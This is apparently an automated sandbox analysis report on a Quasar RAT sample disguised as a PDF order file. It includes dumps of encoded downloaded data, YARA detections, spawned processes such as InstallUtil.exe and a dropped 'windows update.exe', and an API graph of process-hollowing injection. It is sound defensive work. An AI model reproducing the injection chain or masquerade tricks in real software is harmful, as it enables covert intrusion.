                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 30 32 38 21 3d 2e 0e 3e 38 30 32 29 3b 2c 5a 23 39 29 3c 2c 60 23 3e 30 21 38 29 3f 6a 29 3e 23 33 6f 23 34 2f 2d 67 54 e0 a4 21 3d 2f 68 21 37 21 3d 3e 0f f9 c7 cf cd 00 79 32 38 30 23 3c 21 34 59 23 22 30 21 38 29 20 12 c7 30 32 38 6f e0 a4 38 23 32 27 6a 29 20 12 38 cf 32 38 6f 2c 5c e2 ae 30 21 38 20 68 23 28 10 32 38 cf 32 67 2f 22 5c e2 ae 30 21 38 21 68 23 28 10 32 38 30 cd 67 2f 2a 5c e2 ae 29 38 25 60 23 3a 29 38 35 07 ff ce c7 cf 3a b8 4f 33 38 34 18 38 30 29 08 33 32 52 30 32 38 7a 32 38 21 26 32 18 bd 3a 30 34 01 3b 32 38 30 41 51 30 32 32 3a 0a 69 30 32 38 30 41 52 30 32 32 3a ef 7d 30 32 38 16 40 01 30 32 48 42 ea 38 30 42 10 5b 32 38 3a 5d 54 30 32 32 44 42 38 30 33 32 ed 12 38 30 32 1e 42 76 39 30 42 4a e8 32 38 40 1a 53 30 32 32 5f 5e 38
                                                                              Data Ascii: 028!=.>802);,Z#9)<,`#>0!8)?j)>#3o#4/-gT!=/h!7!=>y280#<!4Y#"0!8) 028o8#2'j) 828o,\0!8 h#(282g/"\0!8!h#(280g/*\)8%`#:)85:O38480)32R028z28!&2:04;280AQ022:i0280AR022:}028@02HB80B[28:]T022DB8032802Bv90BJ28@S022_^8
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 2c 30 12 33 30 32 38 10 03 38 30 32 18 02 32 38 30 6a a4 ce 3e 2c 30 12 33 30 32 38 10 3e 38 30 32 18 15 32 38 30 6a a4 ce 3e 2c 30 12 33 30 32 38 10 fd 38 30 32 18 75 32 38 30 6b a4 10 84 38 30 32 18 2c 32 38 30 6a c6 3e 27 38 ce 3e 2c 30 12 33 30 32 38 ce 3e 2d 30 ae 18 bf 32 38 30 12 17 30 32 38 69 cc 36 32 32 c6 3c 26 38 10 3e 38 30 32 c6 3c 30 38 ac 12 89 30 32 38 10 09 38 30 32 61 ce 3c 3a 30 cc 34 24 32 18 3c 32 38 30 cc 34 32 32 a4 10 b8 38 30 32 18 1e 32 38 30 6b c6 3e 30 38 ce 3e 2c 30 12 34 30 32 38 ce 3e 3a 30 ae c6 3c 26 38 10 3e 38 30 32 18 4b 32 38 30 12 23 30 32 38 69 ae 18 b8 32 38 30 12 15 30 32 38 69 cc 36 25 32 c6 3c 26 38 10 3f 38 30 32 c6 3c 27 38 ac cc 34 24 32 18 3d 32 38 30 12 fd 30 32 38 10 73 38 30 32 61 ac cc 34 24 32 18 3d 32
                                                                              Data Ascii: ,03028802280j>,03028>802280j>,03028802u280k802,280j>'8>,03028>-0280028i622<&8>802<08028802a<:04$2<280422802280k>08>,04028>:0<&8>802K280#028i280028i6%2<&8?802<'84$2=280028s802a4$2=2
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 32 1e 10 32 38 30 32 00 34 32 38 30 cc 34 40 32 7d 31 32 38 30 37 38 30 32 00 30 32 38 30 ef 39 1c 32 38 10 29 38 30 32 10 66 31 38 36 08 75 c0 cd c7 16 12 a3 30 32 38 08 70 c8 cf cd 18 27 32 38 30 12 2f 30 32 38 69 cc 36 48 32 18 6a 30 38 30 1a 6e 33 32 3e 09 16 c8 cf cd 1e 10 69 39 30 32 00 29 c2 c7 cf cc 34 55 32 18 32 32 38 30 cc 34 6c 32 a4 10 15 38 30 32 00 31 c2 c7 cf 24 2b 43 12 3b 30 32 38 18 64 3b 30 34 02 df dd c7 cf 14 18 13 32 38 30 0a dc df cd c7 21 76 b6 59 28 63 23 2b 18 8d 33 38 30 0a ea df cd c7 21 0c 29 0a 29 60 21 7c 23 a1 ae 18 f8 32 38 30 1a 6e 33 32 3e 0a 8a d7 cf cd 1e 10 ad 3a 30 32 00 9d dd c7 cf cc 34 1e 32 18 3d 32 38 30 12 b7 30 32 38 10 1d 38 30 32 61 ac 12 81 30 32 38 08 bc d7 cf cd 46 54 33 38 34 1a 7f 33 32 3e 18 62 3b 30
                                                                              Data Ascii: 2280242804@2}128078020280928)802f186u028p'280/028i6H2j080n32>i902)4U222804l28021$+C;028d;04280!vY(c#+380!))`!|#280n32>:0242=280028802a028FT38432>b;0
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: e1 cd c7 21 0c 2e 21 2c 29 0e bc 51 18 31 3b 30 34 18 7c 32 38 30 1a 6e 33 32 3e 0a 2d e9 cf cd 1e 10 21 39 30 32 00 24 e3 c7 cf 23 69 18 00 3b 30 34 18 53 32 38 30 0a 3b e1 cd c7 ce 3e 5d 30 12 3f 30 32 38 10 7a 38 30 32 18 36 32 38 30 6b a4 10 0c 39 30 32 00 d4 e2 c7 cf 23 6b 2f 39 27 5c ae 18 8f 33 38 30 0a eb e0 cd c7 10 e1 38 30 32 18 76 32 38 30 6b c6 3e 74 38 10 00 39 30 32 00 8a e2 c7 cf 23 06 21 08 2f 68 23 79 27 a3 a4 10 fb 39 30 32 10 66 31 38 36 0b 98 e0 cd c7 16 12 f4 30 32 38 08 a7 e8 cf cd 46 51 33 38 34 1a 7f 33 32 3e 18 62 3b 30 34 10 61 31 38 36 12 69 30 32 38 08 45 e8 cf cd 29 0e 23 02 21 55 2e a1 ae 18 21 32 38 30 0a 5c e0 cd c7 ce 3e 5d 30 12 32 30 32 38 10 73 38 30 32 18 3e 32 38 30 6a a4 10 66 3a 30 32 c6 3e 36 38 08 0f e8 cf cd c6
                                                                              Data Ascii: !.!,)Q1;04|280n32>-!902$#i;04S280;>]0?028z8026280k902#k/9'\380802v280k>t8902#!/h#y'902f186028FQ38432>b;04a186i028E)#!U.!280\>]02028s802>280jf:02>68
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 89 cf cd 18 cc 32 38 30 12 6c 30 32 38 69 cc 36 2a 32 18 45 30 38 30 0a db 81 cd c7 21 77 29 61 1a 12 33 32 3e 18 05 3b 30 34 18 ad 33 38 30 0a f3 81 cd c7 21 0c 29 17 23 5f 26 a3 a4 10 d7 39 30 32 c6 3e 36 38 08 82 89 cf cd 2a 26 d2 4b 19 32 38 3a 24 2e 5a 1a 39 33 32 3e 10 85 39 30 32 10 66 31 38 36 0b ad 81 cd c7 16 12 74 31 32 38 08 b8 89 cf cd c6 3c 57 38 23 19 18 06 30 38 30 0a 42 81 cd c7 18 37 3b 30 34 2b 7a 12 32 30 32 38 08 5b 89 cf cd c6 3c 57 38 10 3b 38 30 32 18 98 32 38 30 12 1f 30 32 38 68 ae 18 38 30 38 30 0a 72 81 cd c7 21 61 24 2f 5b a4 10 6d 38 30 32 00 0a 83 c7 cf cc 34 55 32 18 37 32 38 30 12 da 30 32 38 10 79 38 30 32 61 ac 12 a9 31 32 38 18 67 3b 30 34 02 26 83 c7 cf 14 18 4d 32 38 30 0a 33 81 cd c7 ce 3e 16 30 12 2e 30 32 38 10 e5
                                                                              Data Ascii: 280l028i6*2E080!w)a32>;04380!)#_&902>68*&K28:$.Z932>902f186t128<W8#080B7;04+z2028[<W8;802280028h8080r!a$/[m8024U27280028y802a128g;04&M2803>0.028
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 33 38 34 4c 40 31 32 3c 32 31 3c 5f a8 3b 30 34 12 23 02 3c 30 60 38 30 32 38 30 32 38 4e 6e 39 30 36 02 0c 32 38 30 1a 94 32 32 3e 42 17 3d 30 42 10 97 32 38 3a 40 0b 35 32 48 18 8d 38 30 38 10 95 30 38 36 12 b7 30 32 3a 18 97 3b 30 34 10 51 32 38 3a 1a f8 30 32 32 44 bd 38 30 30 b8 6c 33 38 34 4c 64 31 32 3c 32 5d a7 33 32 3e 1a 32 38 d2 4c 50 31 32 3c 4e 15 38 30 38 10 f1 32 38 3a 0b 26 30 32 38 42 73 3d 30 42 10 97 32 38 3a 40 69 35 32 48 18 8d 38 30 38 10 94 30 38 36 b2 50 31 32 3c 4e 5a 39 30 36 12 30 32 38 2b 02 3d 30 62 38 30 32 6c 30 32 29 32 2b 2f 27 41 27 30 32 32 3b 24 34 37 5d 7c 30 32 32 59 3f 31 bd 2e 38 30 33 32 08 27 38 30 32 3f 36 3a 31 5f 6a 38 30 38 2b 34 3a 29 34 6a 34 39 23 3c 69 3f 31 26 0f dc cf cd c7 ed 3f 38 30 32 3f 09 34 38 30
                                                                              Data Ascii: 384L@12<21<_;04#<0`8028028Nn90628022>B=0B28:@52H80808602:;04Q28:022D800l384Ld12<2]32>28LP12<N80828:&028Bs=0B28:@i52H808086P12<NZ906028+=0b802l02)2+/'A'022;$47]|022Y?1.8032'802?6:1_j808+4:)4j49#<i?1&?802?480
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 10 ca 38 30 32 10 f2 31 38 36 08 7f df cd c7 16 12 57 30 32 38 08 0e d7 cf cd 18 b6 32 38 30 12 14 30 32 38 69 cc 36 29 32 18 25 32 38 30 1a fa 33 32 3e 09 2c d7 cf cd 1e 10 b1 38 30 32 00 23 dd c7 cf 12 a4 30 32 38 10 03 38 30 32 60 ce 3c 21 30 12 2f 30 32 38 08 c8 d6 cf cd c6 3c 24 38 10 35 38 30 32 18 d3 32 38 30 12 73 30 32 38 69 ae 18 19 33 38 30 1a fb 33 32 3e 09 e4 d6 cf cd 1e 10 34 39 30 32 00 fb dc c7 cf 23 38 21 19 29 30 23 13 a1 23 3f 21 19 a9 51 e0 a4 10 b3 39 30 32 00 80 dc c7 cf cc 34 21 32 18 36 32 38 30 12 1c 30 32 38 10 71 38 30 32 60 ac 12 70 30 32 38 ce 3c 12 30 0a b1 de cd c7 10 68 38 30 32 18 0d 32 38 30 6a c6 3e 2b 38 10 04 39 30 32 00 44 dc c7 cf cc 34 21 32 18 36 32 38 30 12 48 30 32 38 10 34 38 30 32 60 ac 12 92 30 32 38 18 f0 3b
                                                                              Data Ascii: 802186W028280028i6)2%28032>,802#028802`<!0/028<$85802280s028i38032>4902#8!)0##?!Q9024!26280028q802`p028<0h802280j>+8902D4!26280H0284802`028;


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:10:23:04
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
                                                                              Imagebase:0x450000
                                                                              File size:1'484'800 bytes
                                                                              MD5 hash:9C23449EA828B1D7D4473AA70F86CAA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2252532940.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:10:23:13
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                              Imagebase:0xf80000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:10:23:15
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                              Imagebase:0x470000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:10:23:15
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:10:23:26
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                              Imagebase:0x3c0000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:10:23:26
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:10:23:34
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                              Imagebase:0x6d0000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:10:23:34
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:9.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:9.1%
                                                                                Total number of Nodes:154
                                                                                Total number of Limit Nodes:9
                                                                                execution_graph 31806 489b668 31807 489b6b6 NtProtectVirtualMemory 31806->31807 31809 489b700 31807->31809 32001 4892270 32002 4892285 32001->32002 32005 489239d 32002->32005 32007 48923bf 32005->32007 32006 4892787 32007->32006 32008 489c8d8 VirtualProtect 32007->32008 32009 489c8e0 VirtualProtect 32007->32009 32008->32007 32009->32007 31810 48d61e0 31811 48d61f5 31810->31811 31817 48d64e0 31811->31817 31821 48d6220 31811->31821 31825 48d6210 31811->31825 31829 48d65f0 31811->31829 31812 48d620b 31819 48d627d 31817->31819 31818 48d643a 31818->31812 31819->31818 31833 48d7840 31819->31833 31823 48d624a 31821->31823 31822 48d643a 31822->31812 31823->31822 31824 48d7840 10 API calls 31823->31824 31824->31823 31827 48d6220 31825->31827 31826 48d643a 31826->31812 31827->31826 31828 48d7840 10 API calls 31827->31828 31828->31827 31831 48d627d 31829->31831 31830 48d643a 31830->31812 31831->31830 31832 48d7840 10 API calls 31831->31832 31832->31831 31834 48d7865 31833->31834 31840 48d7d2d 31834->31840 31846 48d7d91 31834->31846 31852 48d7b24 31834->31852 31857 48d7c5e 31834->31857 31835 48d7887 31835->31819 31842 48d7905 31840->31842 31841 48d7c57 31841->31835 31842->31841 31863 48d81f0 31842->31863 31875 48d81e3 31842->31875 31843 48d7b53 31843->31835 31849 48d7905 31846->31849 31847 48d7c57 31847->31835 31848 48d7b53 31848->31835 31849->31847 31850 48d81f0 10 API calls 31849->31850 31851 48d81e3 10 API calls 31849->31851 31850->31848 31851->31848 31853 48d7b2f 31852->31853 31854 48d7b53 31853->31854 31855 48d81f0 10 API calls 31853->31855 31856 48d81e3 10 API calls 31853->31856 31854->31835 31855->31854 31856->31854 31860 48d7905 31857->31860 31858 48d7c57 31858->31835 31859 48d7b53 31859->31835 31860->31858 31861 48d81f0 10 API calls 31860->31861 31862 48d81e3 10 API calls 31860->31862 31861->31859 31862->31859 31864 48d8205 31863->31864 31868 48d8227 31864->31868 31887 48d91b3 31864->31887 31892 48d9083 31864->31892 31897 48d8c81 31864->31897 31902 48d8a04 31864->31902 31907 48d8f65 31864->31907 31912 48d8488 31864->31912 31917 48d853c 31864->31917 31921 48d84a2 31864->31921 31926 48d8eb2 31864->31926 31868->31843 31876 48d81f0 31875->31876 31877 48d8227 31876->31877 31878 48d853c 2 API calls 31876->31878 31879 48d8488 2 API calls 31876->31879 31880 48d8f65 2 API calls 31876->31880 31881 48d8a04 2 API calls 31876->31881 31882 48d8c81 2 API calls 31876->31882 31883 48d9083 2 API calls 31876->31883 31884 48d91b3 2 API calls 31876->31884 31885 48d8eb2 2 API calls 31876->31885 31886 48d84a2 2 API calls 31876->31886 31877->31843 31878->31877 31879->31877 31880->31877 31881->31877 31882->31877 31883->31877 31884->31877 31885->31877 31886->31877 31888 48d91bd 31887->31888 31930 48db220 31888->31930 31935 48db230 31888->31935 31889 48d9223 31893 48d90a5 31892->31893 31948 489c4e8 31893->31948 31952 489c4f0 31893->31952 31894 48d9105 31898 48d8ca3 31897->31898 31900 489c4e8 WriteProcessMemory 31898->31900 31901 489c4f0 WriteProcessMemory 31898->31901 31899 48d8cd0 31900->31899 31901->31899 31903 48d82b8 31902->31903 31904 48d8ba0 31902->31904 31903->31868 31956 489c698 31904->31956 31960 489c6a0 31904->31960 31908 48d8f7d 31907->31908 31964 48d97e0 31908->31964 31969 48d97f0 31908->31969 31909 48d82b8 31909->31868 31913 48d8492 31912->31913 31915 48db220 2 API calls 31913->31915 31916 48db230 2 API calls 31913->31916 31914 48d9223 31915->31914 31916->31914 31993 489bfd0 31917->31993 31997 489bfca 31917->31997 31918 48d8556 31922 48d84c4 31921->31922 31924 489c4e8 WriteProcessMemory 31922->31924 31925 489c4f0 WriteProcessMemory 31922->31925 31923 48d8519 31923->31868 31924->31923 31925->31923 31928 489bfca Wow64SetThreadContext 31926->31928 31929 489bfd0 Wow64SetThreadContext 31926->31929 31927 48d8ecc 31928->31927 31929->31927 31931 48db230 31930->31931 31940 489c3e9 31931->31940 31944 489c3f0 31931->31944 31932 48db267 31932->31889 31936 48db245 31935->31936 31938 489c3e9 VirtualAllocEx 31936->31938 31939 489c3f0 VirtualAllocEx 31936->31939 31937 48db267 31937->31889 31938->31937 31939->31937 31941 489c430 VirtualAllocEx 31940->31941 31943 489c46d 31941->31943 31943->31932 31945 489c430 VirtualAllocEx 31944->31945 31947 489c46d 31945->31947 31947->31932 31949 489c538 WriteProcessMemory 31948->31949 31951 489c58f 31949->31951 31951->31894 31953 489c538 WriteProcessMemory 31952->31953 31955 489c58f 31953->31955 31955->31894 31957 489c6e8 NtResumeThread 31956->31957 31959 489c71d 31957->31959 31959->31903 31961 489c6e8 NtResumeThread 31960->31961 31963 489c71d 31961->31963 31963->31903 31965 48d97f0 31964->31965 31966 48d9829 31965->31966 31974 48d99f1 31965->31974 31979 48d9a99 31965->31979 31966->31909 31970 48d9807 31969->31970 31971 48d9829 31970->31971 31972 48d9a99 2 API calls 31970->31972 31973 48d99f1 2 API calls 31970->31973 31971->31909 31972->31971 31973->31971 31975 48d9a25 31974->31975 31985 489bcd0 31975->31985 31989 489bcc7 31975->31989 31980 48d9a9d 31979->31980 31981 48d9a25 31979->31981 31983 489bcd0 CreateProcessA 31981->31983 31984 489bcc7 CreateProcessA 31981->31984 31982 48d98e9 31983->31982 31984->31982 31986 489bd34 CreateProcessA 31985->31986 31988 489bebc 31986->31988 31990 489bd34 CreateProcessA 31989->31990 31992 489bebc 31990->31992 31994 489c015 Wow64SetThreadContext 31993->31994 31996 489c05d 31994->31996 31996->31918 31998 489c015 Wow64SetThreadContext 31997->31998 32000 489c05d 31998->32000 32000->31918

                                                                                Executed Functions

                                                                                Function 00F24120 Relevance: 5.2, Strings: 4, Instructions: 203COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 367 f24120-f24176 370 f241f2-f241fa 367->370 371 f2417d-f24180 370->371 372 f241a0-f241a5 371->372 373 f24187-f24190 372->373 374 f24192 373->374 375 f24199-f2419e 373->375 374->370 374->371 374->372 374->375 376 f241d2-f241da 374->376 377 f24256-f24275 374->377 378 f2427a-f2427f 374->378 379 f24178-f2417b 374->379 380 f241bc-f241c2 374->380 381 f241dc-f241e2 374->381 382 f241fc-f241fe 374->382 383 f24182-f24185 374->383 384 f241a7-f241af 374->384 385 f2420e-f24251 374->385 375->373 376->383 377->379 394 f24283-f24285 378->394 379->376 388 f241c4 380->388 389 f241cb-f241d0 380->389 390 f241e4 381->390 391 f241eb-f241f0 381->391 392 f24281 382->392 393 f24204-f24209 382->393 383->375 386 f241b1 384->386 387 f241b8-f241ba 384->387 385->379 386->370 386->371 386->376 386->377 386->378 386->379 386->380 386->381 386->382 386->385 386->387 387->373 388->370 388->377 388->378 388->379 388->381 388->382 388->385 388->389 389->383 390->377 390->378 390->382 390->385 390->391 391->371 392->394 393->379 396 f242a1-f242f8 394->396 397 f24287-f2429f 394->397 412 f24310-f24335 396->412 413 f242fa-f24300 396->413 397->396 427 f24337 call f256e2 412->427 428 f24337 call f25711 412->428 414 f24302 413->414 415 f24304-f24306 413->415 414->412 415->412 418 f2433d-f24387 423 f24389-f2438f 418->423 424 f2439f-f243a6 418->424 425 f24393-f24395 423->425 426 f24391 423->426 425->424 426->424 427->418 428->418
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d%cq$d%cq$$]q$$]q
                                                                                • API String ID: 0-2396156113
                                                                                • Opcode ID: 3a338a6330d99b0f271b88a1cfd3d66840c0d00a64e6245662723b0cb5f88920
                                                                                • Instruction ID: b426ca9e5f5b22997ea157c400f758225b106f0fe2d499621c7f3ec16361598d
                                                                                • Opcode Fuzzy Hash: 3a338a6330d99b0f271b88a1cfd3d66840c0d00a64e6245662723b0cb5f88920
                                                                                • Instruction Fuzzy Hash: 2D614931B043158FC709DB39AC50B2A7BAABFD6310F214966D406CF3E5DAB1EC41A792
                                                                                Function 04897F30 Relevance: 3.1, Strings: 2, Instructions: 634COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 429 4897f30-4897f51 430 4897f58-4897fd3 call 4898b00 429->430 431 4897f53 429->431 437 4897fd9-4898016 call 4895d10 430->437 431->430 440 4898018-4898023 437->440 441 4898025 437->441 442 489802f-489814a call 4894fb0 call 4894cd8 440->442 441->442 455 489815c-4898187 442->455 456 489814c-4898152 442->456 457 48989cb-48989e7 455->457 456->455 458 48989ed-4898a08 457->458 459 489818c-489830a call 4894fb0 call 4894cd8 457->459 472 489831c-48984e1 call 4894fb0 call 4894cd8 459->472 473 489830c-4898312 459->473 487 48984e3-48984e7 472->487 488 4898546-4898550 472->488 473->472 490 48984e9-48984ea 487->490 491 48984ef-4898541 call 4894fb0 call 4894cd8 487->491 489 48987ad-48987cc 488->489 492 48987d2-48987fc call 4895a20 489->492 493 4898555-48986b6 call 4894fb0 call 4894cd8 489->493 494 4898852-48988bd 490->494 491->494 504 489884f-4898850 492->504 505 48987fe-489884c call 4894fb0 call 4894cd8 492->505 533 48986bc-48987a3 call 4894fb0 call 4894cd8 493->533 534 48987a6-48987a7 493->534 516 48988cf-4898917 494->516 517 48988bf-48988c5 494->517 504->494 505->504 519 489891d-48989b2 call 4894fb0 call 4894cd8 516->519 520 48989b3-48989c8 516->520 517->516 519->520 520->457 533->534 534->489
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: fbq$8
                                                                                • API String ID: 0-3186246319
                                                                                • Opcode ID: 90ddee7ba0079dc674f2bd364c91e884eaf65d2d6512c417ff10b02674144adb
                                                                                • Instruction ID: ab4d4e9f60b577c754f40db60024d36d70b4ee8ff9b8334c6fa7b1f4a1ace77b
                                                                                • Opcode Fuzzy Hash: 90ddee7ba0079dc674f2bd364c91e884eaf65d2d6512c417ff10b02674144adb
                                                                                • Instruction Fuzzy Hash: AB62D475E006298FDB64DF68C850AD9B7B2FB89304F1486EAD90DA7344DB30AE85CF51
                                                                                Function 0489B660 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 900 489b660-489b6fe NtProtectVirtualMemory 903 489b700-489b706 900->903 904 489b707-489b72c 900->904 903->904
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0489B6F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 64efd0d9080ad89a4b760cb94e3d9b2441eea79d8897c9d6ebb3adc1005746e6
                                                                                • Instruction ID: d94a2037bc8c57622d42b33cc1f4694f1bbd294ecd881e3c40cb4e8def6c0b95
                                                                                • Opcode Fuzzy Hash: 64efd0d9080ad89a4b760cb94e3d9b2441eea79d8897c9d6ebb3adc1005746e6
                                                                                • Instruction Fuzzy Hash: 642124B5D013499FCB10DFAAD580AEEFBF5FF48310F24842AE419A3210C775A944CBA1
                                                                                Function 0489B668 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 908 489b668-489b6fe NtProtectVirtualMemory 911 489b700-489b706 908->911 912 489b707-489b72c 908->912 911->912
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0489B6F1
                                                                                Memory Dump Source
